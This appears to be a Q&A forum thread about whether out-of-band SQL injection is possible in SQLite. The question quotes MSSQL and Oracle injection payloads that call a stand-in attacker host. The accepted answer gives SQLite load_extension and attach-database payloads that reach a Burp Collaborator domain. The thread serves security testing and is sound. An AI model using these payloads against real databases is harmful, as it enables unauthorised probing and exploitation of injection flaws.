# Out of band sql injection in sqlite3?

Tags: sqlite, sql-injection

Is it possible to have Out of band sql injection in sqlite3 database?

I mean if we have Microsoft SQL Server database we can use something like this

> https://example.com/products.aspx?id=1;EXEC master..xp_dirtree >'\test.attacker.com\' --

and for Oracle we can use this

> Select * from products where >id=1||UTL_HTTP.request('http://test.attacker.com/') --

In both the cases above there will be an HTTP request sent to http://test.attacker.com. Is there something similar in sqlite3 which sends an http request to confirm out of band injection?

I tried looking it up here but i dont see anything which can be used to send http requests.

https://sqlite.org/cli.html

Comment: Sqlite does not use sockets, much less http.

Answer (score 0, accepted):

I got the answeer here https://youtu.be/ha6LD1-RiJU?t=901. I tried both the options

```
sqlite> attach database '/net/rc752wcuose5e4m5ifm4nodmjdpdd2.burpcollaborator.ne
t/z' as z;
Error: unable to open database: /net/rc752wcuose5e4m5ifm4nodmjdpdd2.burpcollabor
ator.net/z
```

and this

```
sqlite> select load_extension('//4x2in9x795zizh7i3s7h81yz4qamyb.burpcollaborator
.net');
Error: The specified module could not be found.
```

I got the DNS request in Burp Collaborator for the second payload i.e

```
select load_extension('//4x2in9x795zizh7i3s7h81yz4qamyb.burpcollaborator
    .net');
```

Answer (score 0):

I've got no expertise to answer this question directly, but I have a generic advise regarding this kind of questions in general.

You have to distinguish an SQL injection vulnerability and an **exploit** of such a vulnerability. And the latter is not important at all.

As long as there is a vulnerability, **it will be exploited**, this way or another. And it doesn't make too much difference which particular exploit will be used.

So, in terms of **protection**, you don't care about different exploit techniques at all. All you need is to fix the vulnerability, and it will ditch all possible exploits at once.